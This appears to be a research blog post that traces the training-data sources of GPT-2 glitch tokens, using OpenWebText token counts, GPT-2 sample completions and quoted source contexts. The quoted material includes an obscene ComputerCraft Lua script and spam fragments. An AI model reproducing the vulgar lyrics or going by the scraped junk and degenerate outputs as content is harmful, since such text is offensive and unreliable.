This is a collection of every unidentified GPT2 glitch token listed in the third glitch token archaeology post. I was able to find the source of every single one, except for "?????-" and "?????-?????-"[1].  Please tell me if I missed one, or you've discovered one and don't understand where it came from. This isn't meant to be a well-written analysis, just a quick repository of my glitch-hunting observations.

I plan on writing up and categorizing all of these in greater detail in future posts. The first of which is here.

I used OpenWebText, a recreation of GPT2's training data, for all experiments in this post. I tokenized every .gz file in the archive and made a boolean Numpy array of each tokens that was present at least once. This allowed me to quickly identify infrequent tokens in the dataset and pull up the textual context with regular expressions. If there was an issue with overlap, I used a tokenizer-based extraction instead. All data/code available upon request.

The leftmost column is token id, the middle is the token string, and the right column is # of files the token was present in (out of 20610). GPT2 has 50256 total tokens.

GPT2 tokens with the lowest frequency in OpenWebText


30898 'embedreportprint' 0
33434 '  士' 0
43453 ' SolidGoldMagikarp' 0
1849 '\xa0' 0
47654 ' \xa0\xa0' 0
50009 ' strutConnector' 0
36173 ' RandomRedditor' 0
214 '\x1a' 0
42424 'DragonMagazine' 0
180 ' ' 0
187 ' ' 0
186 ' ' 0
30213 ' externalToEVAOnly' 0
30212 ' externalToEVA' 0
30211 ' guiIcon' 0
185 ' ' 0
30210 ' guiActiveUnfocused' 0
30209 ' unfocusedRange' 0
184 ' ' 0
30202 ' guiName' 0
183 ' ' 0
30905 'rawdownload' 0
39906 'EStream' 0
33454 '龍喚士' 0
42586 ' srfN' 0
25992 ' 裏覚醒' 0
43065 ' srfAttach' 0
11504 ' \xa0 \xa0' 0
39172 '\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0' 0
40240 'oreAndOnline' 0
40241 'InstoreAndOnline' 0
33477 '\xa0\xa0\xa0' 0
36174 ' RandomRedditorWithNo' 0
37574 'StreamerBot' 0
46600 ' Adinida' 0
182 ' ' 0
29372 ' guiActiveUn' 0
43177 'EStreamFrame' 0
22686 ' \xa0 \xa0 \xa0 \xa0' 0
23282 ' davidjl' 0
47571 ' DevOnline' 0
39752 'quickShip' 0
44320 '\n\xa0' 0
8828 '\xa0\xa0\xa0\xa0' 0
39820 '龍 ' 0
39821 '龍契士' 0
28666 'PsyNetMessage' 0
35207 ' attRot' 0
181 ' ' 0
18472 ' guiActive' 0
179 ' ' 0
17811 '\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0' 0
20174 ' 裏 ' 0
212 '\x18' 0
211 '\x17' 0
210 '\x16' 0
209 '\x15' 0
208 '\x14' 0
31666 '?????-?????-' 0
207 '\x13' 0
206 '\x12' 0
213 '\x19' 0
205 '\x11' 0
203 '\x0f' 0
202 '\x0e' 0
31957 'cffffcc' 0
200 '\x0c' 0
199 '\x0b' 0
197 '\t' 0
196 '\x08' 0
195 '\x07' 0
194 '\x06' 0
193 '\x05' 0
204 '\x10' 0
45545 ' サーティワン' 0
201 '\r' 0
216 '\x1c' 0
37842 ' partName' 0
45706 ' \xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0 \xa0' 0
124 ' ' 0
125 ' ' 0
178 ' ' 0
41380 'natureconservancy' 0
41383 'assetsadobe' 0
177 ' ' 0
215 '\x1b' 0
41551 'Downloadha' 0
4603 '\xa0\xa0' 0
42202 'GoldMagikarp' 0
42089 ' TheNitrome' 0
217 '\x1d' 0
218 '\x1e' 0
42090 ' TheNitromeFan' 0
192 '\x04' 0
191 '\x03' 0
219 '\x1f' 0
189 '\x01' 0
45544 ' サーティ' 0
5624 ' \xa0' 0
190 '\x02' 0
40242 'BuyableInstoreAndOnline' 1
36935 ' dstg' 1
36940 ' istg' 1
45003 ' SetTextColor' 1
30897 'reportprint' 1
39757 'channelAvailability' 1
39756 'inventoryQuantity' 1
39755 'isSpecialOrderable' 1
39811 'soDeliveryDate' 1
39753 'quickShipAvailable' 1
39714 'isSpecial' 1
47198 'ItemTracker' 1
17900 ' Dragonbound' 1
45392 'dayName' 1
37579 'TPPStreamerBot' 1
31573 'ActionCode' 2
25193 'NetMessage' 2
39749 'DeliveryDate' 2
30208 ' externalTo' 2
43569 'ÍÍ' 2
34027 ' actionGroup' 2
34504 ' 裏 ' 2
39446 ' SetFontSize' 2
30899 'cloneembedreportprint' 2
32047 ' "$:/' 3
39803 'soType' 3
39177 'ItemThumbnailImage' 3
49781 'EngineDebug' 3
25658 '?????-' 3
33813 '=~=~' 3
48396 'ÛÛ' 3
34206 '#$#$' 3
36938 ' sqor' 3
40219 'oreAnd' 3
32437 ' Smartstocks' 3
35579 ' Mechdragon' 3
38370 'iHUD' 3
36929 ' sidx' 4
39165 'catentry' 4
12781 'wcsstore' 4
34448 ' ItemLevel' 4
38250 ' Skydragon' 5
39253 ' UCHIJ' 5
174 ' ' 6
36130 ' PsyNet' 6
173 ' ' 6
39655 'Orderable' 6
43361 'ゼウス' 6
39142 'ThumbnailImage' 6
41297 ' TAMADRA' 7
25502 'ItemImage' 7
42066 'Nitrome' 8
27013 'aditional' 8
49731 ' EntityItem' 9
24934 'ForgeModLoader' 9
36862 'EMOTE' 11
31765 'MpServer' 11
48069 '*=-' 11
15243 '¯¯¯¯¯¯¯¯' 11
22757 ' 醒' 12
34473 'ヘラ' 12
23090 'ÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂ' 12
31032 'SpaceEngineers' 12
27006 '¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯' 12
50216 ' Leilan' 13
9364 'ÃÂÃÂÃÂÃÂ' 13
39693 'Buyable' 13
40278 '*/(' 13
17629 ' practition' 13
23596 '  ' 14
4690 'ortunately' 14
36926 ' attm' 14
13150 ' subur' 14
19476 ' carbohyd' 14
40236 'FINEST' 14
8980 '¯¯¯¯' 15
176 ' ' 15
14827 'ÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂ' 16
24847 'ModLoader' 17
5815 'ÃÂÃÂ' 18
34516 '>>\\' 19
14341 'PDATE' 19
27924 ' srf' 20
6438 ' 裏' 20
23614 '覚醒' 20
47182 '":""},{"' 21
5367 '¯¯' 21
34604 '\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' 22
31783 ' BaseType' 22
30684 ' ⓘ' 22
24973 ' exting' 23
18945 ' teasp' 23
15272 ' pione' 25
47490 '   ' 25
39374 ' 士' 25
48193 '@#&' 25
30439 ' unintention' 25
25618 ' councill' 25
27293 ' antidepress' 26
36473 'luaj' 26
35496 'ÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂ' 26
42889 'ikuman' 27
45563 'ⓘ' 27
37631 'FactoryReloaded' 28
27097 '-+-+' 28
37444 ' petertodd' 29
29646 ' gobl' 31
35992 'WithNo' 31
40012 'uyomi' 32
23785 '"]=>' 32
7105 ' volunte' 34
36490 '00200000' 35
12677 ' tradem' 35
10298 'senal' 35
42744 '-+-+-+-+' 37
48366 '◼' 37
13945 '  ' 38
47703 '  極' 39
4060 'vertisement' 40
46939 ';;;;;;;;;;;;' 41

Unfortunately, formatting issues are causing tokens 188-221 to display as corrupted or blank. They are \x00 to \x09, among other ASCII sequences. I'm not sure how often GPT2 actually saw these tokens.

Note how much overlap there is with the glitch tokens documented in the 3rd SolidGoldMagikarp investigation post! I've tested many of these low/null-frequency tokens, and most of them indeed behave as glitch tokens.

SolidGoldMagikarp III: Glitch token archaeology — LessWrong

array([['188', '\x00', '20610'],
      ['189', '\x01', '0'],
      ['190', '\x02', '0'],
      ['191', '\x03', '0'],
      ['192', '\x04', '0'],
      ['193', '\x05', '0'],
      ['194', '\x06', '0'],
      ['195', '\x07', '0'],
      ['196', '\x08', '0'],
      ['202', '\x0e', '0'],
      ['203', '\x0f', '0'],
      ['204', '\x10', '0'],
      ['205', '\x11', '0'],
      ['206', '\x12', '0'],
      ['207', '\x13', '0'],
      ['208', '\x14', '0'],
      ['209', '\x15', '0'],
      ['210', '\x16', '0'],
      ['211', '\x17', '0'],
      ['212', '\x18', '0'],
      ['213', '\x19', '0'],
      ['214', '\x1a', '0'],
      ['215', '\x1b', '0'],
      ['221', '\x7f', '478'],
      ['3693', '.[', '20604'],
      ['5815', 'ÃÂÃÂ', '18'],
      ['9364', 'ÃÂÃÂÃÂÃÂ', '13'],
      ['12781', 'wcsstore', '4'],
      ['17405', '\\.', '1783'],
      ['17629', ' practition', '13'],
      ['17900', ' Dragonbound', '1'],
      ['18472', ' guiActive', '0'],
      ['20126', ' \u200b', '9460'],
      ['21807', '\\\\\\\\\\\\\\\\', '45'],
      ['23090', 'ÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂ', '12'],
      ['23282', ' davidjl', '0'],
      ['23614', '覚醒', '20'],
      ['23785', '"]=>', '32'],
      ['24200', ' --------', '2027'],
      ['24398', ' \u200e', '2526'],
      ['24440', 'ュ', '1338'],
      ['24934', 'ForgeModLoader', '9'],
      ['25465', '天', '1478'],
      ['25992', ' 裏覚醒', '0'],
      ['28666', 'PsyNetMessage', '0'],
      ['29372', ' guiActiveUn', '0'],
      ['30202', ' guiName', '0'],
      ['30208', ' externalTo', '2'],
      ['30209', ' unfocusedRange', '0'],
      ['30210', ' guiActiveUnfocused', '0'],
      ['30211', ' guiIcon', '0'],
      ['30212', ' externalToEVA', '0'],
      ['30213', ' externalToEVAOnly', '0'],
      ['30897', 'reportprint', '1'],
      ['30898', 'embedreportprint', '0'],
      ['30899', 'cloneembedreportprint', '2'],
      ['30905', 'rawdownload', '0'],
      ['30906', 'rawdownloadcloneembedreportprint', '4398'],
      ['31032', 'SpaceEngineers', '12'],
      ['31576', 'externalActionCode', '62'],
      ['31583', 'к', '5580'],
      ['31666', '?????-?????-', '0'],
      ['31708', 'ーン', '635'],
      ['31727', 'cffff', '156'],
      ['31765', 'MpServer', '11'],
      ['31886', ' gmaxwell', '133'],
      ['31957', 'cffffcc', '0'],
      ['32047', ' "$:/', '3'],
      ['32437', ' Smartstocks', '3'],
      ['32509', '":[{"', '298'],
      ['33454', '龍喚士', '0'],
      ['34713', '":"","', '275'],
      ['35207', ' attRot', '0'],
      ['35384', "''.", '3964'],
      ['35579', ' Mechdragon', '3'],
      ['36130', ' PsyNet', '6'],
      ['36173', ' RandomRedditor', '0'],
      ['36174', ' RandomRedditorWithNo', '0'],
      ['36481', 'ertodd', '125'],
      ['36938', ' sqor', '3'],
      ['36940', ' istg', '1'],
      ['37082', ' "\\', '1479'],
      ['37444', ' petertodd', '29'],
      ['37574', 'StreamerBot', '0'],
      ['37579', 'TPPStreamerBot', '1'],
      ['37631', 'FactoryReloaded', '28'],
      ['37842', ' partName', '0'],
      ['37858', 'ヤ', '547'],
      ['38214', '\\">', '210'],
      ['38250', ' Skydragon', '5'],
      ['38370', 'iHUD', '3'],
      ['39165', 'catentry', '4'],
      ['39177', 'ItemThumbnailImage', '3'],
      ['39253', ' UCHIJ', '5'],
      ['39446', ' SetFontSize', '2'],
      ['39749', 'DeliveryDate', '2'],
      ['39752', 'quickShip', '0'],
      ['39753', 'quickShipAvailable', '1'],
      ['39755', 'isSpecialOrderable', '1'],
      ['39756', 'inventoryQuantity', '1'],
      ['39757', 'channelAvailability', '1'],
      ['39803', 'soType', '3'],
      ['39811', 'soDeliveryDate', '1'],
      ['39821', '龍契士', '0'],
      ['40240', 'oreAndOnline', '0'],
      ['40241', 'InstoreAndOnline', '0'],
      ['40242', 'BuyableInstoreAndOnline', '1'],
      ['41380', 'natureconservancy', '0'],
      ['41383', 'assetsadobe', '0'],
      ['41441', '\\-', '645'],
      ['41551', 'Downloadha', '0'],
      ['42066', 'Nitrome', '8'],
      ['42089', ' TheNitrome', '0'],
      ['42090', ' TheNitromeFan', '0'],
      ['42202', 'GoldMagikarp', '0'],
      ['42424', 'DragonMagazine', '0'],
      ['42470', 'TextColor', '97'],
      ['42586', ' srfN', '0'],
      ['42728', ' largeDownload', '894'],
      ['43065', ' srfAttach', '0'],
      ['43177', 'EStreamFrame', '0'],
      ['43361', 'ゼウス', '6'],
      ['43453', ' SolidGoldMagikarp', '0'],
      ['44686', 'ーティ', '198'],
      ['45544', ' サーティ', '0'],
      ['45545', ' サーティワン', '0'],
      ['46600', ' Adinida', '0'],
      ['47182', '":""},{"', '21'],
      ['47198', 'ItemTracker', '1'],
      ['47571', ' DevOnline', '0'],
      ['48193', '@#&', '25'],
      ['49781', 'EngineDebug', '3'],
      ['50009', ' strutConnector', '0'],
      ['50216', ' Leilan', '13'],
      ['40012', 'uyomi', '32'],
      ['45335', 'aterasu', '487'],
      ['14827', 'ÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂ', '16'],
      ['5808', 'ÃÂ', '44'],
      ['48396', 'ÛÛ', '3'],
      ['41297', ' TAMADRA', '7'],
      ['39906', 'EStream', '0']], dtype='<U32')

 

Similarly, most documented glitch tokens also had low occurence in the dataset. I will remark upon the exceptions later.

 

Glitch Tokens and Where They Came From

48193 @#& 25

# of token of interest present in each file: 

[3299, 4, 3, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]

This was present in 25 files, of which 24 were 1-4 instances of profanity censors ("God f@#&ing damn"). The one exception contained >3000 instances.

ComputerCraft code

local pkg = { [ "var" ] = { [ "linox.ver" ] = "Linox v0.0.1" , [ "mpc-get-repo.rpo" ] = "I staple tape worms on my penis!@#&So the flesh worm will drink brainjuice from your fetus!@#&(4X)!@#&!@#&Feel the blood gushing from your anus!@#&(2X)!@#&!@#&Feel the blood gushing from your anus!@#&(4X)!@#&!@#&Tape worms on my fucking penis!!@#&Penis!!@#&Tape worms!!@#&Tape worms on my penis!!@#&Tape worms on my penis!@#&Tape worms on my peniiiiiii....!" , } , [ "etc" ] = { [ "linoxim" ] = " !@#& 55555 !@#& 54445 !@#& 54e45 !@#& 54e45 555 !@#& 54e45 !@#& 54e45555555 555 55555555 55555 555 555 !@#& 54e44444445 555 55555555 55555 555 555 !@#& 54eeeeeee45 555 555 555 55 55 5555 !@#& 54444444445 555 555 555 55555 555 555 !@#& 55555555555 555 555 555 55555 555 555 !@#& !@#& !@#& !@#& !@#& !@#& !@#& " , [ "linoxm" ] = " !@#& 55555 !@#& 54445 !@#& 54e45 !@#& 54e45 555 !@#& 54e45 !@#& 54e45555555 555 55555555 55555 555 555 !@#& 54e44444445 555 55555555 55555 555 555 !@#& 54eeeeeee45 555 555 555 55 55 5555 !@#& 54444444445 555 555 555 55555 555 555 !@#& 55555555555 555 555 555 55555 555 555 !@#& !@#& eee eee e e !@#& e e e e e e !@#& e e e e e e e !@#& e e e eeeee e eee !@#& !@#& " , [ "bg" ] = " !@#& 55555 !@#& 54445 !@#& 54e45 !@#& 54e45 555 !@#& 54e45 !@#& 54e45555555 555 55555555 55555 555 555 !@#& 54e44444445 555 55555555 55555 555 555 !@#& 54eeeeeee45 555 555 555 55 55 55555 !@#& 54444444445 555 555 555 55555 555 555 !@#& 55555555555 555 555 555 55555 555 555 !@#& !@#& !@#& !@#& !@#& !@#& !@#& " , [ "mfb" ] = { } , } , [ "startup" ] = "if not os.getComputerLabel() then!@#& os.setComputerLabel( \\" SEXY_BEAST \\" )!@#&end!@#&cua = fs.open( \\" /lib/usr/users \\" , \\" r \\" )!@#&if cua.readAll() == \\" \\" then!@#& cua.close()!@#& sua = fs.open( \\" /lib/usr/users \\" , \\" w \\" )!@#& sua.writeLine(\'{[ \\" admin \\" ]= \\" d74ff0ee8da3b9806b18c877dbf29bbde50b5bd8e4dad7a3a725000feb82e8f1 \\" ,}\')!@#& sua.close()!@#&else!@#& cua.close()!@#&end!@#&motd = { \\" Coded by __Hithere \\" , \\" http://zudohackz.koding.com \\" , \\" ALIENS \\" , \\" [xx]* -<I\'m a testicle!> \\" , \\" You can only hack my penis on singleplayer! \\" , \\" Internal stack failure, system halted? \\" , \\" Kernel Panic! \\" , \\" Warning: Logging in will make you a nerd


()!@#&!@#& if e == \\" char \\" then!@#& local s = false!@#& if properties.textLength and line:len() < properties.textLength then s = true!@#& elseif not properties.textLength then s = true end!@#&!@#& local canType = true!@#& if not properties.grantPrint and properties.refusePrint then!@#& local canTypeKeys = {}!@#& if type(properties.refusePrint) == \\" table \\" then!@#& for _, v in pairs(properties.refusePrint) do!@#& table.insert(canTypeKeys, tostring(v):sub(1, 1))!@#& end!@#& elseif type(properties.refusePrint) == \\" string \\" then!@#& for char in properties.refusePrint:gmatch( \\" . \\" ) do!@#& table.insert(canTypeKeys, char)!@#& end!@#& end!@#& for _, v in pairs(canTypeKeys) do if but == v then canType = false end end!@#& elseif properties.grantPrint then!@#& canType = false!@#& local canTypeKeys = {}!@#& if type(properties.grantPrint) == \\" table \\" then!@#& for _, v in pairs(properties.grantPrint) do!@#& table.insert(canTypeKeys, tostring(v):sub(1, 1))!@#& end!@#& elseif type(properties.grantPrint) == \\" string \\" then!@#& for char in properties.grantPrint:gmatch( \\" . \\" ) do!@#& table.insert(canTypeKeys, char)!@#& end!@#& end!@#& for _, v in pairs(canTypeKeys) do if but == v then canType = true end end!@#& end!@#&!@#& if s and canType then!@#& line = line:sub(1, pos) .. but .. line:sub(pos + 1, -1)!@#& pos = pos + 1!@#& redraw()!@#& end!@#& elseif e == \\" key \\" then!@#& if but == keys.enter then break!@#& elseif but == keys.left then if pos > 0 then pos = pos - 1 redraw() end!@#& elseif but == keys.right then if pos < line:len() then pos = pos + 1 redraw() end!@#& elseif (but == keys.up or but == keys.down) and properties.history then!@#& redraw( \\" \\" )!@#& if but == keys.up then!@#& if historyPos == nil and #properties.history > 0 then !@#& historyPos = #properties.history!@#& elseif historyPos > 1 then !@#& historyPos = historyPos - 1!@#& end!@#& elseif but == keys.down then!@#& if historyPos == #properties.history then historyPos = nil!@#& elseif historyPos ~= nil then historyPos = historyPos + 1 end!@#& end!@#&!@#& if properties.history and historyPos then!@#& line = properties.history[historyPos]!@#& pos = line:len()!@#& else!@#& line = \\" \\" !@#& pos = 0!@#& end!@#&!@#& redraw()!@#& local a = sendLiveUpdates( \\" history \\" )!@#& if a then return a end!@#& elseif but == keys.backspace and pos > 0 then!@#& redraw( \\" \\" )!@#& line = line:sub(1, pos - 1) .. line:sub(pos + 1, -1)!@#& pos = pos - 1!@#& redraw()!@#& local a = sendLiveUpdates( \\" delete \\" )!@#& if a then return a end!@#& elseif but == keys.home then!@#& pos = 0!@#& redraw()!@#& elseif but == keys.delete and pos < line:len() then!@#& redraw( \\" \\" )!@#& line = line:sub(1, pos) .. line:sub(pos + 2, -1)!@#& redraw()!@#& local a = sendLiveUpdates( \\" delete \\" )!@#& if a then return a end!@#& elseif but == keys[ \\" end \\" ] then!@#& pos = line:len()!@#& redraw()!@#& elseif properties.exitOnKey then !@#& if but == properties.exitOnKey or (properties.exitOnKey == \\" control \\" and !@#& (but == 29 or but == 157)) then !@#& term.setCursorBlink(false)!@#& return nil!@#& end!@#& end!@#& end!@#& local a = sendLiveUpdates(e, but, x, y, p4, p5)!@#& if a then return a end!@#& end!@#&!@#& term.setCursorBlink(false)!@#& if line ~= nil then line = line:gsub( \\" ^%s*(.-)%s*$ \\" , \\" %1 \\" ) end!@#& return line!@#&end!@#&!@#&!@#&-- -------- Themes!@#&!@#&local defaultTheme = {!@#& background = \\" gray \\" ,!@#& backgroundHighlight = \\" lightGray \\" ,!@#& prompt = \\" cyan \\" ,!@#& promptHighlight = \\" lightBlue \\" ,!@#& err = \\" red \\" ,!@#& errHighlight = \\" pink \\" ,!@#&!@#& editorBackground = \\" gray \\" ,!@#& editorLineHightlight = \\" lightBlue \\" ,!@#& editorLineNumbers = \\" gray \\" ,!@#& editorLineNumbersHighlight = \\" lightGray \\" ,!@#& editorError = \\" pink \\" ,!@#& editorErrorHighlight = \\" red \\" ,!@#&!@#& textColor = \\" white \\" ,!@#& conditional = \\" yellow \\" ,!@#& constant = \\" orange \\"', ' nil then historyPos = historyPos + 1 end!@#& end!@#&!@#& if properties.history and historyPos then!@#& line = properties.history[historyPos]!@#& pos = line:len()!@#& else!@#& line = \\" \\" !@#& pos = 0!@#& end!@#&!@#& redraw()!@#& local a = sendLiveUpdates( \\" history \\" )!@#& if a then return a end!@#& elseif but == keys.backspace and pos > 0 then!@#& redraw( \\" \\" )!@#& line = line:sub(1, pos - 1) .. line:sub(pos + 1, -1)!@#& pos = pos - 1!@#& redraw()!@#& local a = sendLiveUpdates( \\" delete \\" )!@#& if a then return a end!@#& elseif but == keys.home then!@#& pos = 0!@#& redraw()!@#& elseif but == keys.delete and pos < line:len() then!@#& redraw( \\" \\" )!@#& line = line:sub(1, pos) .. line:sub(pos + 2, -1)!@#& redraw()!@#& local a = sendLiveUpdates( \\" delete \\" )!@#& if a then return a end!@#& elseif but == keys[ \\" end \\" ] then!@#& pos = line:len()!@#& redraw()!@#& elseif properties.exitOnKey then !@#& if but == properties.exitOnKey or (properties.exitOnKey == \\" control \\" and !@#& (but == 29 or but == 157)) then !@#& term.setCursorBlink(false)!@#& return nil!@#& end!@#& end!@#& end!@#& local a = sendLiveUpdates(e, but, x, y, p4, p5)!@#& if a then return a end!@#& end!@#&!@#& term.setCursorBlink(false)!@#& if line ~= nil then line = line:gsub( \\" ^%s*(.-)%s*$ \\" , \\" %1 \\" ) end!@#& return line!@#&end!@#&!@#&!@#&-- -------- Themes!@#&!@#&local defaultTheme = {!@#& background = \\" gray \\" ,!@#& backgroundHighlight = \\" lightGray \\" ,!@#& prompt = \\" cyan \\" ,!@#& promptHighlight = \\" lightBlue \\" ,!@#& err = \\" red \\" ,!@#& errHighlight = \\" pink \\" ,!@#&!@#& editorBackground = \\" gray \\" ,!@#& editorLineHightlight = \\" lightBlue \\" ,!@#& editorLineNumbers = \\" gray \\" ,!@#& editorLineNumbersHighlight = \\" lightGray \\" ,!@#& editorError = \\" pink \\" ,!@#& editorErrorHighlight = \\" red \\" ,!@#&!@#& textColor = \\" white \\" ,!@#& conditional = \\" yellow \\" ,!@#& constant = \\" orange \\" ,!@#& [ \\" function \\" ] = \\" magenta \\" ,!@#& string = \\" red \\" ,!@#& comment = \\" lime \\" !@#&}!@#&!@#&local normalTheme = {!@#& background = \\" black \\" ,!@#& backgroundHighlight = \\" black \\" ,!@#& prompt = \\" black \\" ,!@#& promptHighlight = \\" black \\" ,!@#& err = \\" black \\" ,!@#& errHighlight = \\" black \\" ,!@#&!@#& editorBackground = \\" black \\" ,!@#& editorLineHightlight = \\" black \\" ,!@#& editorLineNumbers = \\" black \\" ,!@#& editorLineNumbersHighlight = \\" white \\" ,!@#& editorError = \\" black \\" ,!@#& editorErrorHighlight = \\" black \\" ,!@#&!@#& textColor = \\" white \\" ,!@#& conditional = \\" white \\" ,!@#& constant = \\" white \\" ,!@#& [ \\" function \\" ] = \\" white \\" ,!@#& string = \\" white \\" ,!@#& comment = \\" white \\" !@#&}!@#&!@#&local availableThemes = {!@#& { \\" Water (Default) \\" , \\" https://raw.github.com/GravityScore/LuaIDE/master/themes/default.txt \\" },!@#& { \\" Fire \\" , \\" https://raw.github.com/GravityScore/LuaIDE/master/themes/fire.txt \\" },!@#& { \\" Sublime Text 2 \\" , \\" https://raw.github.com/GravityScore/LuaIDE/master/themes/st2.txt \\" },!@#& { \\" Midnight \\" , \\" https://raw.github.com/GravityScore/LuaIDE/master/themes/midnight.txt \\" },!@#& { \\" TheOriginalBIT \\" , \\" https://raw.github.com/GravityScore/LuaIDE/master/themes/bit.txt \\" },!@#& { \\" Superaxander \\" , \\" https://raw.github.com/GravityScore/LuaIDE/master/themes/superaxander.txt \\" },!@#& { \\" Forest \\" , \\" https://raw.github.com/GravityScore/LuaIDE/master/themes/forest.txt \\" },!@#& { \\" Night \\" , \\" https://raw.github.com/GravityScore/LuaIDE/master/themes/night.txt \\" 

 

Other users helped me identify it as being part of a script for ComputerCraft, a Minecraft mod.

 

 

35496 ÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂ 26
 

[1184, 1127, 1126, 1041, 1035, 966, 825, 768, 518, 224, 128, 128, 96, 84, 68, 32, 30, 28, 22, 16, 8, 4, 4, 2, 2, 2] (sum=9468) (these are non-overlapping instances)

There are tokenization for repeating "ÃÂ" sequences of length 1, 2, 4, 8, 16, 32, and 64. Others pointed out that this was a common formating issue with online text. But why were sequences of length 64 so common as to get tokenized?

It's literally because of one website, archive.org. 

https://archive.org/details/AlessandroMoreschi

It seems that archive.org has a few old comments that have massive chunks of such text. 600,000+ total A's, in fact, across dozens of pages. Although similar text exist on other sites, they were far fewer, and Archive.org was also the only example of length 16+ A tokens in the dataset, meaning it was likely the sole reason those tokens were ever present in the final tokenizer. That said,

I did see this post before my investigation, but guessed that something would have interrupted the sequence before it got to perfect sequences of thousands of letters. Obviously I was wrong.

In any case, ÃÂ sequences were rare enough that none (not even "ÃÂ"!) were included in the tokenizers for GPT3.5/GPT4 or GPT4o.

 

31727 cffff 156
 

This token was commonly found in World of Warcraft chat and auction scrapes. It, alongside "cffffcc" are also part of hex color codes. GPT2 almost always completes prompts with just "cffffcc" as "cffffcc00" followed by code. "cffffcc00" is hex for yellow, and apparently it's common as to color text for WoW notifications? 

GPT2 completions from "cffffcc" as prompt

cffffcc00Level 1 - 100 Hat\n\n\nThe Hat\n\n\nLevel 1 - 100 Hat\n\nattach particle effect static (28)\n\n\n( Not Tradable or Marketable )\n\n\nThe Hat\n\nLevel 1 - 100 Hat\n\n\nThe

cffffcc00RANGE Spell Damage - - - - Spell damage increased by 1.4% for every level\n\nBase duration increased by 1.4% every level\n\nDamage increased by 1.4% every level for every level\n\n

cffffcc00Level 1 - 100 Hat\n\n\nThe Scarecrow\n\n\nLevel 1 - 100 Hat\n\n\nThe Scarecrow\n\n\nLevel 1 - 100 Hat\n\n\nThe Scarecrow\n\n\nLevel 1 - 100 Hat\n\n\nThe Scarecrow\n\n
cffffcc00F - Aura of Protection - [|cffffcc00Level 1|r],(1|r) - [|cffffcc00Level 2|r],(2|r) - [|cffffcc00Level 3|r] Researchtip=(|cffffcc

These turned out to be quite similar to chat and hotkey commands for Warcraft and DOTA, and also the exact type of stuff that would get scraped from Github.  "cffffcc" was not present at all in OpenWebText, although "cffff" was part of various WoW chat log scrapes, where it was used to set text color.

 

(7131 '][' 20471) and (3693 '.[' 20604) and (42669 ').[' 19013) and (42924 '".[' 19219)

These were interesting as '.[' was the most commonly occuring glitch token (other than \x00, which is just ASCII for whitespace). It was in 20604/20610 files.

Most were part of references, and most of that was Wikipedia. The remainder was code, Javascript if I recall correctly.

Wikipedia Entries

 "The Wretched Automatons" is sung in a variant of English and was recorded prior to the addition of the mechanical sounds that run throughout the track, while "Kainé" is in a version of Gaelic.[2]\n\nSquare Enix released a soundtrack album of music from the game, titled NieR Gestalt & Replicant Original Soundtrack, on April 21, 2010. The two-disc, 2:30:09-long album has the catalog numbers of SQEX-10189/90.[4] As preorder bonuses for Nier Gestalt and Nier Replicant, the two versions of the game released in Japan, two mini-albums, Nier Gestalt Mini Album and Nier Replicant Mini Album, were included. Each one contains five tracks from the full soundtrack album; Gestalt corresponds with tracks 1 and 4 from disc 1, 8 and 13 from disc 2, and an electronic version of "Kainé" titled "Kainé / Rain of Light", while Replicant encompasses track 3 from disc 2, tracks 2 and 7 from disc 1, track 1 from disc 2, and a medley of several tracks.[5][6] Gestalt is 18:11 long, and Replicant 17:11.[5][6] A book of sheet music of piano arrangements of tracks from the game by Okabe was published by KMP on April 22, 2011. The book, NieR Gestalt & Replicant Official Score Book, contains 25 arrangements in 112 pages.[7] Guitar arrangements of "Song of the Ancients / Devola" and "Yonah / Strings Ver." by Yuji Sekiguchi were included in the Square Enix Official Best Collection guitar solo sheet music book, published by KMP in May 2011.[8]\n\nThe soundtrack album reached number 24 on the Japanese Oricon music charts, and remained on the charts for 11 weeks.[9] It was well received by critics; Patrick Gann of RPGFan called the album "an insanely good soundtrack" and noted it as his candidate for video game soundtrack of the year, as well as "one of the best game soundtracks ever". He applauded that the music was both "meticulously-crafted" and "accessible to the untrained ear".[4] Don Kotowski of Square Enix Music Online praised the "captivating vocal work" and "exquisite" composition. He also noted that each track retained a sense of individuality even when it reused themes from other tracks.[10] He was less complimentary towards the mini albums, which he regarded as good introductions to the soundtrack as a whole but not worth purchasing on their own.[5][6]

 

31708 ーン 635

"ーン" is often part of transliterated English words. A common example was as part of "ブロックチェーン" (Burokku chēn), which is just the Japanese pronunciation of Blockchain. There was also some stuff about the Rothschilds.

Crypto spam

